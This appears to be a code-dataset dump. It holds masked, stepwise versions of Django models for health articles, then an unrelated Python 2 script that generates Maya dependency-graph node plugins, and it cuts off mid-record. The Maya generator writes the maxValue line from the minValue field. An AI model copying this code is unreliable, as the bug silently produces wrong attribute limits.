token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def get_absolute_url(self):\n content_type = ContentType.objects.get_for_model(self)\n return reverse('admin:%s_%s_change' % (content_type.app_label,\n content_type.model), args=[self.id])\n\n def icon_tag(self):\n if self.icon:\n return mark_safe('<img src=\"%s\" width=\"150\" height=\"150\" />' %\n self.icon.url)\n return ''\n\n def save(self, *args, **kwargs):\n self.published_date = (self.published_date if self.published_date else\n datetime.date.today())\n if hasattr(self, 'url'):\n self.url = self.url.strip('/').lower()\n super().save(*args, **kwargs)\n\n def __str__(self):\n return self.title\n\n\n class Meta:\n db_table = 'article'\n\n\nclass ArticleImage(TimeStampedModel, CreatedByModel):\n name = models.ImageField(upload_to='article/images')\n\n def image_tag(self):\n if self.name:\n return mark_safe('<img src=\"%s\" width=\"150\" height=\"150\" />' %\n self.name.url)\n return ''\n\n def __str__(self):\n if self.name:\n return self.name.url\n return ''\n\n\n class Meta:\n db_table = 'article_image'\n\n\nclass ArticleContentBox(TimeStampedModel):\n name = models.CharField(max_length=1000)\n title = models.CharField(max_length=1000)\n rank = models.PositiveSmallIntegerField(default=0, blank=True)\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n db_table = 'article_content_box'\n\n\nclass ArticleLinkedUrl(TimeStampedModel):\n article = models.ForeignKey(Article, on_delete=models.CASCADE)\n url = models.CharField(max_length=2000, unique=True)\n title = models.CharField(max_length=500)\n content_box = models.ForeignKey(ArticleContentBox, null=True, on_delete\n =models.SET_NULL)\n\n def __str__(self):\n return self.title\n\n\n class Meta:\n db_table = 'article_linked_urls'\n\n\nclass LinkedArticle(TimeStampedModel):\n article = models.ForeignKey(Article, on_delete=models.CASCADE,\n related_name='related_articles')\n linked_article = models.ForeignKey(Article, on_delete=models.CASCADE,\n related_name='related_article')\n title = models.CharField(max_length=500, null=True, blank=False)\n content_box = models.ForeignKey(ArticleContentBox, null=True, on_delete\n =models.SET_NULL)\n\n def __str__(self):\n return '{}-{}'.format(self.article.title, self.linked_article.title)\n\n\n class Meta:\n db_table = 'linked_articles'\n unique_together = ('article', 'linked_article'),\n\n\nclass MedicineSpecialization(TimeStampedModel):\n medicine = models.ForeignKey(Article, on_delete=models.CASCADE)\n specialization = models.ForeignKey(PracticeSpecialization, on_delete=\n models.CASCADE, null=True, blank=True)\n\n def __str__(self):\n return self.medicine.title + ' ' + self.specialization.name\n\n\n class Meta:\n db_table = 'medicine_specialization'\n", "step-4": "<mask token>\n\n\nclass Article(TimeStampedModel, CreatedByModel):\n title = models.CharField(blank=False, null=False, max_length=500,\n unique=True)\n url = models.CharField(blank=False, null=True, max_length=500, unique=True)\n heading_title = models.CharField(blank=True, null=False, max_length=500)\n body = models.CharField(blank=False, null=False, max_length=200000)\n category = models.ForeignKey(ArticleCategory, null=True, related_name=\n 'articles', on_delete=models.SET_NULL)\n header_image = models.ImageField(upload_to='articles/header/images',\n null=True, blank=True, default='')\n header_image_alt = models.CharField(max_length=512, blank=True, null=\n True, default='')\n icon = models.ImageField(upload_to='articles/icons', null=True, blank=\n True, default='')\n is_published = models.BooleanField(default=False, verbose_name='Published')\n description = models.CharField(max_length=500, blank=True, null=True)\n keywords = models.CharField(max_length=256, blank=True, null=True)\n author_name = models.CharField(max_length=256, null=True, blank=True)\n author = models.ForeignKey(Doctor, null=True, blank=True, related_name=\n 'published_articles', on_delete=models.SET_NULL)\n published_date = models.DateField(default=datetime.date.today)\n linked_articles = models.ManyToManyField('self', symmetrical=False,\n through='LinkedArticle', through_fields=('article', 'linked_article'))\n pharmeasy_url = models.TextField(blank=True, null=True)\n pharmeasy_product_id = models.PositiveIntegerField(null=True, blank=True)\n is_widget_available = models.NullBooleanField()\n\n def get_absolute_url(self):\n content_type = ContentType.objects.get_for_model(self)\n return reverse('admin:%s_%s_change' % (content_type.app_label,\n content_type.model), args=[self.id])\n\n def icon_tag(self):\n if self.icon:\n return mark_safe('<img src=\"%s\" width=\"150\" height=\"150\" />' %\n self.icon.url)\n return ''\n\n def save(self, *args, **kwargs):\n self.published_date = (self.published_date if self.published_date else\n datetime.date.today())\n if hasattr(self, 'url'):\n self.url = self.url.strip('/').lower()\n super().save(*args, **kwargs)\n\n def __str__(self):\n return self.title\n\n\n class Meta:\n db_table = 'article'\n\n\nclass ArticleImage(TimeStampedModel, CreatedByModel):\n name = models.ImageField(upload_to='article/images')\n\n def image_tag(self):\n if self.name:\n return mark_safe('<img src=\"%s\" width=\"150\" height=\"150\" />' %\n self.name.url)\n return ''\n\n def __str__(self):\n if self.name:\n return self.name.url\n return ''\n\n\n class Meta:\n db_table = 'article_image'\n\n\nclass ArticleContentBox(TimeStampedModel):\n name = models.CharField(max_length=1000)\n title = models.CharField(max_length=1000)\n rank = models.PositiveSmallIntegerField(default=0, blank=True)\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n db_table = 'article_content_box'\n\n\nclass ArticleLinkedUrl(TimeStampedModel):\n article = models.ForeignKey(Article, on_delete=models.CASCADE)\n url = models.CharField(max_length=2000, unique=True)\n title = models.CharField(max_length=500)\n content_box = models.ForeignKey(ArticleContentBox, null=True, on_delete\n =models.SET_NULL)\n\n def __str__(self):\n return self.title\n\n\n class Meta:\n db_table = 'article_linked_urls'\n\n\nclass LinkedArticle(TimeStampedModel):\n article = models.ForeignKey(Article, on_delete=models.CASCADE,\n related_name='related_articles')\n linked_article = models.ForeignKey(Article, on_delete=models.CASCADE,\n related_name='related_article')\n title = models.CharField(max_length=500, null=True, blank=False)\n content_box = models.ForeignKey(ArticleContentBox, null=True, on_delete\n =models.SET_NULL)\n\n def __str__(self):\n return '{}-{}'.format(self.article.title, self.linked_article.title)\n\n\n class Meta:\n db_table = 'linked_articles'\n unique_together = ('article', 'linked_article'),\n\n\nclass MedicineSpecialization(TimeStampedModel):\n medicine = models.ForeignKey(Article, on_delete=models.CASCADE)\n specialization = models.ForeignKey(PracticeSpecialization, on_delete=\n models.CASCADE, null=True, blank=True)\n\n def __str__(self):\n return self.medicine.title + ' ' + self.specialization.name\n\n\n class Meta:\n db_table = 'medicine_specialization'\n", "step-5": "from django.db import models\nfrom django.utils.safestring import mark_safe\nfrom ondoc.authentication.models import TimeStampedModel, CreatedByModel, Image\nimport datetime\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.urls import reverse\n\nfrom ondoc.doctor.models import Doctor, PracticeSpecialization\n\n\nclass ArticleCategory(TimeStampedModel):\n\n name = models.CharField(blank=False, null=False, max_length=500)\n identifier = models.CharField(max_length=48, blank=False, null=True)\n url = models.CharField(blank=False, null=True, max_length=500, unique=True)\n title = models.CharField(max_length=500, null=True, blank=True)\n description = models.CharField(max_length=200000, null=True, blank=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n db_table = \"article_categories\"\n\n def save(self, *args, **kwargs):\n if hasattr(self, 'url'):\n self.url = self.url.strip('/').lower()\n super(ArticleCategory, self).save(*args, **kwargs)\n\n\nclass Article(TimeStampedModel, CreatedByModel):\n title = models.CharField(blank=False, null=False, max_length=500, unique=True)\n url = models.CharField(blank=False, null=True, max_length=500, unique=True)\n heading_title = models.CharField(blank=True, null=False, max_length=500)\n body = models.CharField(blank=False, null=False, max_length=200000)\n category = models.ForeignKey(ArticleCategory, null=True, related_name='articles', on_delete=models.SET_NULL)\n header_image = models.ImageField(upload_to='articles/header/images', null=True, blank=True, default='')\n header_image_alt = models.CharField(max_length=512, blank=True, null=True, default='')\n icon = models.ImageField(upload_to='articles/icons', null=True, blank=True, default='')\n is_published = models.BooleanField(default=False, verbose_name='Published')\n description = models.CharField(max_length=500, blank=True, null=True)\n keywords = models.CharField(max_length=256, blank=True, null=True)\n author_name = models.CharField(max_length=256, null=True, blank=True)\n author = models.ForeignKey(Doctor, null=True, blank=True, related_name='published_articles', on_delete=models.SET_NULL)\n published_date = models.DateField(default=datetime.date.today)\n linked_articles = models.ManyToManyField('self', symmetrical=False, through='LinkedArticle',\n through_fields=('article', 'linked_article'))\n pharmeasy_url = models.TextField(blank=True, null=True)\n pharmeasy_product_id = models.PositiveIntegerField(null=True, blank=True)\n is_widget_available = models.NullBooleanField()\n\n def get_absolute_url(self):\n content_type = ContentType.objects.get_for_model(self)\n return reverse('admin:%s_%s_change' % (content_type.app_label, content_type.model), args=[self.id])\n\n def icon_tag(self):\n if self.icon:\n return mark_safe('<img src=\"%s\" width=\"150\" height=\"150\" />' % (self.icon.url))\n return \"\"\n\n def save(self, *args, **kwargs):\n self.published_date = self.published_date if self.published_date else datetime.date.today()\n if hasattr(self, 'url'):\n self.url = self.url.strip('/').lower()\n super().save(*args, **kwargs)\n\n def __str__(self):\n return self.title\n\n class Meta:\n db_table = \"article\"\n\n\nclass ArticleImage(TimeStampedModel, CreatedByModel):\n name = models.ImageField(upload_to='article/images')\n\n def image_tag(self):\n if self.name:\n return mark_safe('<img src=\"%s\" width=\"150\" height=\"150\" />' % (self.name.url))\n return \"\"\n\n def __str__(self):\n if self.name:\n return self.name.url\n return \"\"\n\n class Meta:\n db_table = \"article_image\"\n\nclass ArticleContentBox(TimeStampedModel):\n name = models.CharField(max_length=1000)\n title = models.CharField(max_length=1000)\n rank = models.PositiveSmallIntegerField(default=0, blank=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n db_table = 'article_content_box'\n\n\nclass ArticleLinkedUrl(TimeStampedModel):\n article = models.ForeignKey(Article, on_delete=models.CASCADE)\n url = models.CharField(max_length=2000, unique=True)\n title = models.CharField(max_length=500)\n content_box = models.ForeignKey(ArticleContentBox,null=True, on_delete=models.SET_NULL)\n\n def __str__(self):\n return self.title\n\n class Meta:\n db_table = 'article_linked_urls'\n\n\nclass LinkedArticle(TimeStampedModel):\n article = models.ForeignKey(Article, on_delete=models.CASCADE, related_name='related_articles')\n linked_article = models.ForeignKey(Article, on_delete=models.CASCADE, related_name='related_article')\n title = models.CharField(max_length=500, null=True, blank=False)\n content_box = models.ForeignKey(ArticleContentBox,null=True, on_delete=models.SET_NULL)\n\n def __str__(self):\n return \"{}-{}\".format(self.article.title, self.linked_article.title)\n\n class Meta:\n db_table = 'linked_articles'\n unique_together = (('article', 'linked_article'),)\n\n\nclass MedicineSpecialization(TimeStampedModel):\n medicine = models.ForeignKey(Article, on_delete=models.CASCADE)\n specialization = models.ForeignKey(PracticeSpecialization, on_delete=models.CASCADE, null=True,\n blank=True)\n\n def __str__(self):\n return self.medicine.title + \" \" + self.specialization.name\n\n class Meta:\n db_table = \"medicine_specialization\"\n\n", "step-ids": [ 9, 18, 21, 22, 28 ] }
[ 9, 18, 21, 22, 28 ]
## CreateDGNode.py # This files creates the boilerplate code for a Dependency Graph Node import FileCreator ## Class to create Maya DG node plugin files class DGNodeFileCreator(FileCreator.FileCreator): ## Constructor def __init__(self): FileCreator.FileCreator.__init__(self, "DGNodePluginData.json") self.writePluginDetails() self.writeClass() self.writeInitialisation() ## Create a separator for the plugin and then write the node details def writePluginDetails(self): # Write a separator for the plugin self.writeLine("#----------------------------------------------------------") self.writeLine("# Plugin") self.writeLine("#----------------------------------------------------------") self.writeLine() # write the plugin name self.writeLine("# Node info") kPluginNodeName = self.getFromJSON("nodeName", "string") self.writeLine("kPluginNodeName = " + "\"" + kPluginNodeName + "\"") kPluginNodeID = self.getFromJSON("nodeID", "string") self.writeLine("kPluginNodeID = om.MTypeId(" + kPluginNodeID + ")") self.writeLine() # write the default attribute values if it is not None, i.e. it is defined self.writeLine("# Default attribute values") self.inputAttributes = self.getFromJSON("inputAttributes", "array") for attr in self.inputAttributes: if (attr["defaultValue"] != None): variableName = attr["longName"] + "DefaultValue" variableValue = attr["defaultValue"] self.writeLine(variableName + " = " + str(variableValue)) self.writeLine() ## Write the class definition def writeClass(self): cDescription = self.getFromJSON("classDescription", "string") self.writeLine("## " + cDescription) cName = self.getFromJSON("className", "string") self.writeLine("class " + cName + "(om.MPxNode):") self.writeLine("# Define the attributes", 1) # Write all the input attributes first with the prefix in for attr in self.inputAttributes: variableName = "in" + self.capitalise(attr["longName"]) self.writeLine(variableName + " = om.MObject()", 1) # Write all the output attributes with the prefix out self.outputAttributes = self.getFromJSON("outputAttributes", "array") for attr in self.outputAttributes: variableName = "out" + self.capitalise(attr["longName"]) self.writeLine(variableName + " = om.MObject()", 1) self.writeLine() # write the init function self.writeLine("def __init__(self):", 1) self.writeLine("om.MPxNode.__init__(self)", 2) self.writeLine() # write the compute function self.writeComputeFunction() ## Write the compute class function def writeComputeFunction(self): # write the comments self.writeLine("## The function that is called when the node is dirty", 1) self.writeLine("# @param _plug A plug for one of the i/o attributes", 1) self.writeLine("# @param _dataBlock The data used for the computations", 1) self.writeLine("def compute(self, _plug, _dataBlock):", 1) # loop through each output attribute and create an if statement for each one className = self.getFromJSON("className", "string") for attr in self.outputAttributes: self.writeLine("# Check if the plug is the %s attribute" % attr["longName"], 2) self.writeLine("if (_plug == " + className + ".out" + self.capitalise(attr["longName"]) + "):", 2) # Get the handles for the attributes self.writeLine("# Get handles for the attributes", 3) # Get the input values for dependency in attr["dependencies"]: # Check if the dependency is an input attribute try: d = [x["longName"] for x in self.inputAttributes if (x["longName"] == dependency or x["shortName"] == dependency)][0] self.writeLine(d + "DataHandle = _dataBlock.inputValue(" + className + ".in" + self.capitalise(d) + ")", 3) except: print "Warning: ", dependency, "is not an input attribute." self.writeLine(attr["longName"] + "DataHandle = _dataBlock.outputValue(" + className + ".out" + self.capitalise(attr["longName"]) + ")", 3) self.writeLine() # Extract the values self.writeLine("# Get values for the attributes", 3) for dependency in attr["dependencies"]: # Check if the dependency is an input attribute try: dName = [x["longName"] for x in self.inputAttributes if (x["longName"] == dependency or x["shortName"] == dependency)][0] dType = [x["type"] for x in self.inputAttributes if (x["longName"] == dependency or x["shortName"] == dependency)][0] # Check for multiple values, e.g. 2Float, and put the digit at the end of the string if dType[0].isdigit(): dType = dType[1:] + dType[0] self.writeLine(dName + "Value = " + dName + "DataHandle.as" + dType + "()", 3) except: pass self.writeLine() # Perform the desired computation self.writeLine("# Perform the desired computation here", 3) self.writeLine("# " + attr["longName"] + "Value =", 3) self.writeLine() # Set the output value self.writeLine("# Set the output value", 3) self.writeLine(attr["longName"] + "DataHandle.set" + attr["type"] + "(" + attr["longName"] + "Value)", 3) self.writeLine() # Mark the output data handle as clean self.writeLine("# Mark the output data handle as clean", 3) self.writeLine(attr["longName"] + "DataHandle.setClean()", 3) self.writeLine() ## Write the plugin initialisation functions def writeInitialisation(self): # Write a separator for the plugin initialisation self.writeLine("#----------------------------------------------------------") self.writeLine("# Plugin Initialisation") self.writeLine("#----------------------------------------------------------") self.writeLine() # Function to use API 2.0 self.writeLine("## This function tells Maya to use the Python API 2.0") self.writeLine("def maya_useNewAPI():") self.writeLine("pass", 1) self.writeLine("") # node creator function self.writeLine("## Create an instance of the node") self.writeLine("def nodeCreator():") className = self.getFromJSON("className", "string") self.writeLine("return " + className + "()", 1) self.writeLine() # write the nodeInitializer function self.writeNodeInitialiser() # write the load and unload plugin functions self.writeInitialiseUninitialiseFunctions() ## Write the nodeInitializer function def writeNodeInitialiser(self): self.writeLine("## Initialise the node attributes") self.writeLine("def nodeInitializer():") # Decide if a numeric function set or a typed function set is needed or both numericFn = False typedFn = False numericTypes = self.getFromJSON("validNumericTypes", "array") nonNumericTypes = self.getFromJSON("validNonNumericTypes", "array") for attr in self.inputAttributes + self.outputAttributes: if attr["type"] in numericTypes: numericFn = True break if attr["type"] in nonNumericTypes: typedFn = True # Check if there is a typed function set needed if typedFn == False: for attr in self.inputAttributes + self.outputAttributes: if attr["type"] in nonNumericTypes: typedFn = True break if (numericFn): self.writeLine("# Create a numeric attribute function set", 1) self.writeLine("mFnNumericAttribute = om.MFnNumericAttribute()", 1) if (typedFn): self.writeLine("# Create a non-numeric attribute function set", 1) self.writeLine("mFnTypedAttribute = om.MFnTypedAttribute()", 1) self.writeLine() className = self.getFromJSON("className", "string") # Write the input attributes self.writeLine("# Input node attributes", 1) for attr in self.inputAttributes: # Check if the attribute is numeric or non-numeric (typed) if attr["type"] in numericTypes: attrType = ["Numeric", "Numeric"] else: attrType = ["Typed", ""] variableName = className + ".in" + self.capitalise(attr["longName"]) fnParameters = "\"" + attr["longName"] + "\", \"" + attr["shortName"] + "\", om.MFn" + attrType[1] + "Data.k" + attr["type"] if attr["defaultValue"] != None: fnParameters += ", " + attr["longName"] + "DefaultValue" self.writeLine(variableName + " = mFn" + attrType[0] + "Attribute.create(" + fnParameters + ")", 1) self.writeLine("mFn" + attrType[0] + "Attribute.readable = False", 1) self.writeLine("mFn" + attrType[0] + "Attribute.writable = True", 1) self.writeLine("mFn" + attrType[0] + "Attribute.storable = True", 1) if attr["keyable"]: self.writeLine("mFn" + attrType[0] + "Attribute.keyable = True", 1) else: self.writeLine("mFn" + attrType[0] + "Attribute.keyable = False", 1) if attr["minValue"] != None: self.writeLine("mFn" + attrType[0] + "Attribute.minValue = " + str(attr["minValue"]), 1) if attr["maxValue"] != None: self.writeLine("mFn" + attrType[0] + "Attribute.maxValue = " + str(attr["minValue"]), 1) self.writeLine() # Write the output node attributes self.writeLine("# Output node attributes", 1) for attr in self.outputAttributes: # Check if the attribute is numeric or non-numeric (typed) if attr["type"] in numericTypes: attrType = ["Numeric", "Numeric"] else: attrType = ["Typed", ""] variableName = className + ".out" + self.capitalise(attr["longName"]) fnParameters = "\"" + attr["longName"] + "\", \"" + attr["shortName"] + "\", om.MFn" + attrType[1] + "Data.k" + attr["type"] self.writeLine(variableName + " = mFn" + attrType[0] + "Attribute.create(" + fnParameters + ")", 1) self.writeLine("mFn" + attrType[0] + "Attribute.readable = True", 1) self.writeLine("mFn" + attrType[0] + "Attribute.writable = False", 1) self.writeLine("mFn" + attrType[0] + "Attribute.storable = False", 1) self.writeLine() # Add the attributes to the class self.writeLine("# Add the attributes to the class", 1) for attr in self.inputAttributes: self.writeLine(className + ".addAttribute(" + className + ".in" + self.capitalise(attr["longName"]) + ")", 1) for attr in self.outputAttributes: self.writeLine(className + ".addAttribute(" + className + ".out" + self.capitalise(attr["longName"]) + ")", 1) self.writeLine() # Write the dependencies self.writeLine("# Connect input/output dependencies", 1) for attr in self.outputAttributes: for dependency in attr["dependencies"]: # Check if the dependency is an input attribute try: d = [x["longName"] for x in self.inputAttributes if (x["longName"] == dependency or x["shortName"] == dependency)][0] self.writeLine(className + ".attributeAffects(" + className + ".in" + self.capitalise(d) + ", " + className + ".out" + self.capitalise(attr["longName"]) + ")", 1) except: pass self.writeLine() ## Write the functions for initializePlugin and uninitializePlugin def writeInitialiseUninitialiseFunctions(self): # Write the function for initializePlugin self.writeLine("## Initialise the plugin when Maya loads it") self.writeLine("def initializePlugin(mobject):") self.writeLine("mplugin = om.MFnPlugin(mobject)", 1) self.writeLine("try:", 1) self.writeLine("mplugin.registerNode(kPluginNodeName, kPluginNodeID, nodeCreator, nodeInitializer)", 2) self.writeLine("except:", 1) self.writeLine("sys.stderr.write(\"Failed to register node: \" + kPluginNodeName)", 2) self.writeLine("raise", 2) self.writeLine() # Write the function for uninitializePlugin self.writeLine("## Uninitialise the plugin when Maya unloads it") self.writeLine("def uninitializePlugin(mobject):") self.writeLine("mplugin = om.MFnPlugin(mobject)", 1) self.writeLine("try:", 1) self.writeLine("mplugin.deregisterNode(kPluginNodeID)", 2) self.writeLine("except:", 1) self.writeLine("sys.stderr.write(\"Failed to unregister node: \" + kPluginNodeName)", 2) self.writeLine("raise", 2) self.writeLine() # Main DGNodeFileCreator()
normal
{ "blob_id": "8271935901896256b860f4e05038763709758296", "index": 4722, "step-1": "## CreateDGNode.py\n# This files creates the boilerplate code for a Dependency Graph Node\n\nimport FileCreator\n\n## Class to create Maya DG node plugin files\nclass DGNodeFileCreator(FileCreator.FileCreator):\n\n\t## Constructor\n\tdef __init__(self):\n\t\tFileCreator.FileCreator.__init__(self, \"DGNodePluginData.json\")\n\t\tself.writePluginDetails()\n\t\tself.writeClass()\n\t\tself.writeInitialisation()\n\n\t## Create a separator for the plugin and then write the node details\n\tdef writePluginDetails(self):\n\t\t# Write a separator for the plugin\n\t\tself.writeLine(\"#----------------------------------------------------------\")\n\t\tself.writeLine(\"# Plugin\")\n\t\tself.writeLine(\"#----------------------------------------------------------\")\n\t\tself.writeLine()\n\t\t# write the plugin name\n\t\tself.writeLine(\"# Node info\")\n\t\tkPluginNodeName = self.getFromJSON(\"nodeName\", \"string\")\n\t\tself.writeLine(\"kPluginNodeName = \" + \"\\\"\" + kPluginNodeName + \"\\\"\")\n\t\tkPluginNodeID = self.getFromJSON(\"nodeID\", \"string\")\n\t\tself.writeLine(\"kPluginNodeID = om.MTypeId(\" + kPluginNodeID + \")\")\n\t\tself.writeLine()\n\t\t# write the default attribute values if it is not None, i.e. it is defined\n\t\tself.writeLine(\"# Default attribute values\")\n\t\tself.inputAttributes = self.getFromJSON(\"inputAttributes\", \"array\")\n\t\tfor attr in self.inputAttributes:\n\t\t\tif (attr[\"defaultValue\"] != None):\n\t\t\t\tvariableName = attr[\"longName\"] + \"DefaultValue\"\n\t\t\t\tvariableValue = attr[\"defaultValue\"]\n\t\t\t\tself.writeLine(variableName + \" = \" + str(variableValue))\n\t\tself.writeLine()\n\n\t## Write the class definition\n\tdef writeClass(self):\n\t\tcDescription = self.getFromJSON(\"classDescription\", \"string\")\n\t\tself.writeLine(\"## \" + cDescription)\n\t\tcName = self.getFromJSON(\"className\", \"string\")\n\t\tself.writeLine(\"class \" + cName + \"(om.MPxNode):\")\n\t\tself.writeLine(\"# Define the attributes\", 1)\n\t\t# Write all the input attributes first with the prefix in\n\t\tfor attr in self.inputAttributes:\n\t\t\tvariableName = \"in\" + self.capitalise(attr[\"longName\"])\n\t\t\tself.writeLine(variableName + \" = om.MObject()\", 1)\n\t\t# Write all the output attributes with the prefix out\n\t\tself.outputAttributes = self.getFromJSON(\"outputAttributes\", \"array\")\n\t\tfor attr in self.outputAttributes:\n\t\t\tvariableName = \"out\" + self.capitalise(attr[\"longName\"])\n\t\t\tself.writeLine(variableName + \" = om.MObject()\", 1)\n\t\tself.writeLine()\n\t\t# write the init function\n\t\tself.writeLine(\"def __init__(self):\", 1)\n\t\tself.writeLine(\"om.MPxNode.__init__(self)\", 2)\n\t\tself.writeLine()\n\t\t# write the compute function\n\t\tself.writeComputeFunction()\n\n\t## Write the compute class function\n\tdef writeComputeFunction(self):\n\t\t# write the comments\n\t\tself.writeLine(\"## The function that is called when the node is dirty\", 1)\n\t\tself.writeLine(\"# @param _plug A plug for one of the i/o attributes\", 1)\n\t\tself.writeLine(\"# @param _dataBlock The data used for the computations\", 1)\n\t\tself.writeLine(\"def compute(self, _plug, _dataBlock):\", 1)\n\t\t# loop through each output attribute and create an if statement for each one\n\t\tclassName = self.getFromJSON(\"className\", \"string\")\n\t\tfor attr in self.outputAttributes:\n\t\t\tself.writeLine(\"# Check if the plug is the %s attribute\" % attr[\"longName\"], 2)\n\t\t\tself.writeLine(\"if (_plug == \" + className + \".out\" + self.capitalise(attr[\"longName\"]) + \"):\", 2)\n\t\t\t# Get the handles for the attributes\n\t\t\tself.writeLine(\"# Get handles for the attributes\", 3)\n\t\t\t# Get the input values\n\t\t\tfor dependency in attr[\"dependencies\"]:\n\t\t\t\t# Check if the dependency is an input attribute\n\t\t\t\ttry:\n\t\t\t\t\td = [x[\"longName\"] for x in self.inputAttributes if (x[\"longName\"] == dependency or x[\"shortName\"] == dependency)][0]\n\t\t\t\t\tself.writeLine(d + \"DataHandle = _dataBlock.inputValue(\" + className + \".in\" + self.capitalise(d) + \")\", 3)\n\t\t\t\texcept:\n\t\t\t\t\tprint \"Warning: \", dependency, \"is not an input attribute.\"\n\t\t\tself.writeLine(attr[\"longName\"] + \"DataHandle = _dataBlock.outputValue(\" + className + \".out\" + self.capitalise(attr[\"longName\"]) + \")\", 3)\n\t\t\tself.writeLine()\n\t\t\t# Extract the values\n\t\t\tself.writeLine(\"# Get values for the attributes\", 3)\n\t\t\tfor dependency in attr[\"dependencies\"]:\n\t\t\t\t# Check if the dependency is an input attribute\n\t\t\t\ttry:\n\t\t\t\t\tdName = [x[\"longName\"] for x in self.inputAttributes if (x[\"longName\"] == dependency or x[\"shortName\"] == dependency)][0]\n\t\t\t\t\tdType = [x[\"type\"] for x in self.inputAttributes if (x[\"longName\"] == dependency or x[\"shortName\"] == dependency)][0]\n\t\t\t\t\t# Check for multiple values, e.g. 2Float, and put the digit at the end of the string\n\t\t\t\t\tif dType[0].isdigit():\n\t\t\t\t\t\tdType = dType[1:] + dType[0]\n\t\t\t\t\tself.writeLine(dName + \"Value = \" + dName + \"DataHandle.as\" + dType + \"()\", 3)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\tself.writeLine()\n\t\t\t# Perform the desired computation\n\t\t\tself.writeLine(\"# Perform the desired computation here\", 3)\n\t\t\tself.writeLine(\"# \" + attr[\"longName\"] + \"Value =\", 3)\n\t\t\tself.writeLine()\n\t\t\t# Set the output value\n\t\t\tself.writeLine(\"# Set the output value\", 3)\n\t\t\tself.writeLine(attr[\"longName\"] + \"DataHandle.set\" + attr[\"type\"] + \"(\" + attr[\"longName\"] + \"Value)\", 3)\n\t\t\tself.writeLine()\n\t\t\t# Mark the output data handle as clean\n\t\t\tself.writeLine(\"# Mark the output data handle as clean\", 3)\n\t\t\tself.writeLine(attr[\"longName\"] + \"DataHandle.setClean()\", 3)\n\t\tself.writeLine()\n\n\t## Write the plugin initialisation functions\n\tdef writeInitialisation(self):\n\t\t# Write a separator for the plugin initialisation\n\t\tself.writeLine(\"#----------------------------------------------------------\")\n\t\tself.writeLine(\"# Plugin Initialisation\")\n\t\tself.writeLine(\"#----------------------------------------------------------\")\n\t\tself.writeLine()\n\t\t# Function to use API 2.0\n\t\tself.writeLine(\"## This function tells Maya to use the Python API 2.0\")\n\t\tself.writeLine(\"def maya_useNewAPI():\")\n\t\tself.writeLine(\"pass\", 1)\n\t\tself.writeLine(\"\")\n\t\t# node creator function\n\t\tself.writeLine(\"## Create an instance of the node\")\n\t\tself.writeLine(\"def nodeCreator():\")\n\t\tclassName = self.getFromJSON(\"className\", \"string\")\n\t\tself.writeLine(\"return \" + className + \"()\", 1)\n\t\tself.writeLine()\n\t\t# write the nodeInitializer function\n\t\tself.writeNodeInitialiser()\n\t\t# write the load and unload plugin functions\n\t\tself.writeInitialiseUninitialiseFunctions()\n\n\t## Write the nodeInitializer function\n\tdef writeNodeInitialiser(self):\n\t\tself.writeLine(\"## Initialise the node attributes\")\n\t\tself.writeLine(\"def nodeInitializer():\")\n\t\t# Decide if a numeric function set or a typed function set is needed or both\n\t\tnumericFn = False\n\t\ttypedFn = False\n\t\tnumericTypes = self.getFromJSON(\"validNumericTypes\", \"array\")\n\t\tnonNumericTypes = self.getFromJSON(\"validNonNumericTypes\", \"array\")\n\t\tfor attr in self.inputAttributes + self.outputAttributes:\n\t\t\tif attr[\"type\"] in numericTypes:\n\t\t\t\tnumericFn = True\n\t\t\t\tbreak\n\t\t\tif attr[\"type\"] in nonNumericTypes:\n\t\t\t\ttypedFn = True\n\t\t# Check if there is a typed function set needed\n\t\tif typedFn == False:\n\t\t\tfor attr in self.inputAttributes + self.outputAttributes:\n\t\t\t\tif attr[\"type\"] in nonNumericTypes:\n\t\t\t\t\ttypedFn = True\n\t\t\t\t\tbreak\n\t\tif (numericFn):\n\t\t\tself.writeLine(\"# Create a numeric attribute function set\", 1)\n\t\t\tself.writeLine(\"mFnNumericAttribute = om.MFnNumericAttribute()\", 1)\n\t\tif (typedFn):\n\t\t\tself.writeLine(\"# Create a non-numeric attribute function set\", 1)\n\t\t\tself.writeLine(\"mFnTypedAttribute = om.MFnTypedAttribute()\", 1)\n\t\tself.writeLine()\n\t\tclassName = self.getFromJSON(\"className\", \"string\")\n\t\t# Write the input attributes\n\t\tself.writeLine(\"# Input node attributes\", 1)\n\t\tfor attr in self.inputAttributes:\n\t\t\t# Check if the attribute is numeric or non-numeric (typed)\n\t\t\tif attr[\"type\"] in numericTypes:\n\t\t\t\tattrType = [\"Numeric\", \"Numeric\"]\n\t\t\telse:\n\t\t\t\tattrType = [\"Typed\", \"\"]\n\t\t\tvariableName = className + \".in\" + self.capitalise(attr[\"longName\"])\n\t\t\tfnParameters = \"\\\"\" + attr[\"longName\"] + \"\\\", \\\"\" + attr[\"shortName\"] + \"\\\", om.MFn\" + attrType[1] + \"Data.k\" + attr[\"type\"]\n\t\t\tif attr[\"defaultValue\"] != None:\n\t\t\t\tfnParameters += \", \" + attr[\"longName\"] + \"DefaultValue\"\n\t\t\tself.writeLine(variableName + \" = mFn\" + attrType[0] + \"Attribute.create(\" + fnParameters + \")\", 1)\n\t\t\tself.writeLine(\"mFn\" + attrType[0] + \"Attribute.readable = False\", 1)\n\t\t\tself.writeLine(\"mFn\" + attrType[0] + \"Attribute.writable = True\", 1)\n\t\t\tself.writeLine(\"mFn\" + attrType[0] + \"Attribute.storable = True\", 1)\n\t\t\tif attr[\"keyable\"]:\n\t\t\t\tself.writeLine(\"mFn\" + attrType[0] + \"Attribute.keyable = True\", 1)\n\t\t\telse:\n\t\t\t\tself.writeLine(\"mFn\" + attrType[0] + \"Attribute.keyable = False\", 1)\n\t\t\tif attr[\"minValue\"] != None:\n\t\t\t\tself.writeLine(\"mFn\" + attrType[0] + \"Attribute.minValue = \" + str(attr[\"minValue\"]), 1)\n\t\t\tif attr[\"maxValue\"] != None:\n\t\t\t\tself.writeLine(\"mFn\" + attrType[0] + \"Attribute.maxValue = \" + str(attr[\"minValue\"]), 1)\n\t\t\tself.writeLine()\n\t\t# Write the output node 